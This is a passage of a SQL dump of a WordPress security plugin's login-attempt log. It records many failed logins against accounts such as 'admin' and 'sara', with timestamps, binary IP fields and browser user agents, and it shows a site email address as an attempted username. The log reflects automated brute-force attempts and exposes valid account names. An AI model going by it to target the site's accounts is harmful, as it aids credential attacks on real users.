Chrome/30.0.1599.17 Safari/537.36'),(2320,12501,1699651624.344813,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ʬ\Z','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(2321,13139,1699742084.898899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36'),(2330,13653,1704307761.511588,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0U[','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(2369,15360,1704899678.760513,1,'loginFailInvalidUsername','Mini Gut Guru',0,'\0\0\0\0\0\0\0\0\0\0[\\','Mozilla/5.0'),(2361,14995,1704815144.601631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kA','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2360,14974,1704804551.322342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(2352,14461,1704638173.465666,1,'loginFailValidUsername','Sara',2,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2101.0 Safari/537.36'),(2351,14452,1704634432.035364,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k^','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(2346,14290,1704547375.417361,1,'loginFailInvalidUsername','temp3',0,'\0\0\0\0\0\0\0\0\0\0X','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(2345,14270,1704530648.161291,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>B','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2344,14268,1704529341.551629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0э8','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),(2341,13890,1704441163.672336,1,'loginFailValidUsername','admin',1,'*\0\0\0\0\0\0/p','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(2342,14214,1704503316.519170,1,'loginFailValidUsername','admin',1,'&\0\0\0\0\0 \0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'),(2343,14250,1704519548.963613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(2350,14401,1704612881.478614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0;','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2349,14374,1704604639.257404,1,'loginFailInvalidUsername','MUWY',0,'\0\0\0\0\0\0\0\0\0\0.b@','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'),(2348,14362,1704599202.902481,1,'loginFailInvalidUsername','admin6',0,'*H\04\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),(2347,14344,1704581396.033559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0b8','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(2359,14970,1704801442.844271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0b7','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2358,14939,1704787474.293736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(2357,14918,1704773293.900516,1,'loginFailInvalidUsername','administratoir',0,'*@\0\0aj:\0\0\0\0\0P','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'),(2354,14725,1704713666.529220,1,'loginFailInvalidUsername','administratoir',0,'*y\0\0\0\0\0\0I','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0'),(2353,14599,1704645108.211068,1,'loginFailValidUsername','admin',1,'&\0\0\0\0\0\0$\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(2356,14864,1704751708.640134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kZ','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2355,14850,1704744340.020337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0xhx','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(2368,15345,1704896957.675197,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0b','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(399,843,1693910718.363415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Linux; Android 10; U705AA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(400,844,1693910720.186277,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\03Dx','Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(401,845,1693910723.473155,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0f\0\"','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0'),(402,846,1693910737.264965,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0gD','Mozilla/5.0 (Linux; Android 11; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36'),(403,847,1693910739.970728,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0e','Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(404,848,1693910742.182761,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0\\W','Mozilla/5.0 (Linux; Android 9; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(405,898,1693937939.754021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(406,899,1693938091.171418,1,'loginFailValidUsername','sara',2,' A\0\0\0\0\0\0\0 ','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(407,900,1693938093.924536,1,'loginFailValidUsername','sara',2,' @\0\0\0\0\0\0\0\0\0l','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(408,901,1693938095.646486,1,'loginFailValidUsername','sara',2,' @\0\0\0\0\0\0\0\0\0l','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(409,902,1693938098.033341,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(410,903,1693938105.626549,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0^.-','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(411,904,1693938106.883512,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(412,905,1693938110.835111,1,'loginFailValidUsername','sara',2,' AA8\0\0\0B8s','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(413,906,1693938115.397586,1,'loginFailValidUsername','sara',2,' A,r\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(414,907,1693938115.742576,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0v}P','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(415,908,1693938121.201016,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0; ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(416,909,1693938125.800993,1,'loginFailValidUsername','sara',2,' @\0\0\0\0\0\0\0\0\0l','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(417,910,1693938129.591183,1,'loginFailValidUsername','sara',2,'*o\0\0FM','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(418,913,1693939913.290374,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(419,915,1693940877.465442,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(420,964,1693942484.464765,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0GA','Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(421,965,1693942484.525599,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0km&','Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(422,966,1693942489.838442,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0^.-','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),(423,967,1693942491.479709,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(424,967,1693942491.489999,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(425,969,1693942499.092050,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0vkY','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(426,970,1693942499.344842,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0#־','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(427,971,1693942503.586184,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0#־','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(428,978,1693945627.982714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(429,980,1693945899.794761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(430,982,1693946884.729281,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0GA','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(431,983,1693946885.781304,1,'loginFailValidUsername','sara',2,' AA8\0\0\0B8v','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(432,984,1693946891.985522,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0v}P','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'),(433,984,1693946891.994793,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0v}P','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'),(434,985,1693946903.009553,1,'loginFailValidUsername','sara',2,'*x\0\0\0\0\0\0\0h\0@','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(435,986,1693946904.809665,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0C \\','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(436,987,1693946909.611516,1,'loginFailValidUsername','sara',2,' AA8\0\0\0B8v','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(437,987,1693946909.619342,1,'loginFailValidUsername','sara',2,' AA8\0\0\0B8v','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(438,988,1693946911.648000,1,'loginFailValidUsername','sara',2,'*o\0\0FM','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(439,1001,1693951297.398465,1,'loginFailValidUsername','sara',2,'(\0\0\0\0\0\0\0\0`','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(440,1002,1693951298.533964,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0z','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(441,1003,1693951301.228981,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0km&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(442,1004,1693951305.698723,1,'loginFailValidUsername','sara',2,' A\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(443,1005,1693951306.110174,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0[T','Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(444,1006,1693951313.915324,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0G\n','Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),(445,1007,1693951316.202865,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0-M','Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(446,1017,1693957635.555173,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(447,1018,1693958166.024087,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0Ǖ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(448,1019,1693958172.038624,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0G\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(449,1020,1693958174.203386,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(450,1021,1693958174.489686,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0MQx','Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(451,1021,1693958174.498782,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0MQx','Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(452,1022,1693958177.837811,1,'loginFailValidUsername','sara',2,' A\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),(453,1023,1693958182.479416,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'),(454,1024,1693958183.863872,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0km&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(455,1025,1693958190.698878,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0#־','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(456,1026,1693958193.546631,1,'loginFailValidUsername','sara',2,' A\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(457,1027,1693958193.942818,1,'loginFailValidUsername','sara',2,'*8\n\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(458,1028,1693958197.486473,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0km&','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(459,1030,1693958572.445176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(460,1031,1693958813.764829,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 10; SM-A115U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(461,1032,1693958815.938681,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0T-','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(462,1033,1693958820.524630,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0g#','Mozilla/5.0 (Linux; Android 11; SM-A215U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(463,1034,1693958821.489519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(464,1035,1693958831.598211,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0aS','Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U1 Build/M1AJQ; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36'),(465,1036,1693958834.396254,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0sT[','Mozilla/5.0 (Linux; Android 10; Nokia C2 Tennen) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(466,1037,1693958837.228107,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0uyZ','Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(467,1038,1693958841.692684,1,'loginFailInvalidUsername','ccc1',0,'\0\0\0\0\0\0\0\0\0\0jK6!','Mozilla/5.0 (Linux; Android 10; E6910) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(468,1041,1693959221.660097,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(469,1042,1693959223.861611,1,'loginFailInvalidUsername','armani',0,'\0\0\0\0\0\0\0\0\0\0&O','Mozilla/5.0 (iPhone; CPU iPhone OS 12_5_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),(470,1043,1693959226.923442,1,'loginFailInvalidUsername','henri',0,'\0\0\0\0\0\0\0\0\0\0N','Mozilla/5.0 (Linux; Android 12; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(471,1044,1693959234.215632,1,'loginFailInvalidUsername','lukas',0,'\0\0\0\0\0\0\0\0\0\0tԕ','Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(472,1045,1693959237.660709,1,'loginFailInvalidUsername','xxx',0,'\0\0\0\0\0\0\0\0\0\0y8՟','Mozilla/5.0 (Linux; Android 11; SM-N986U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(473,1046,1693959240.802468,1,'loginFailInvalidUsername','zero',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(515,1102,1693967784.598059,1,'loginFailValidUsername','sara',2,' Bu\0\0\0E1p>','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(516,1103,1693967788.705660,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0u\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(517,1104,1693967797.436750,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0%e','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(518,1105,1693967805.252250,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0k ','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(519,1106,1693968078.913875,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(520,1117,1693972649.880224,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0yt','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),(521,1118,1693972650.151802,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(522,1118,1693972650.164082,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(523,1120,1693972657.611299,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0`Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(524,1121,1693972658.314112,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0)9','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(525,1122,1693972660.721755,1,'loginFailValidUsername','sara',2,' AA8\0\0\0B8m','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(526,1123,1693972667.800855,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0gD','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(527,1124,1693972670.338881,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),(528,1125,1693972675.723314,1,'loginFailValidUsername','sara',2,'&S\0\0\0\0\0\0\0\0!','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(529,1126,1693972677.523111,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\07L','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(530,1127,1693972680.996673,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\03[D','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(531,1128,1693972686.754224,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0-Ln','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(532,1130,1693972687.763179,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0C \\','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(533,1131,1693972692.934825,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0G\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 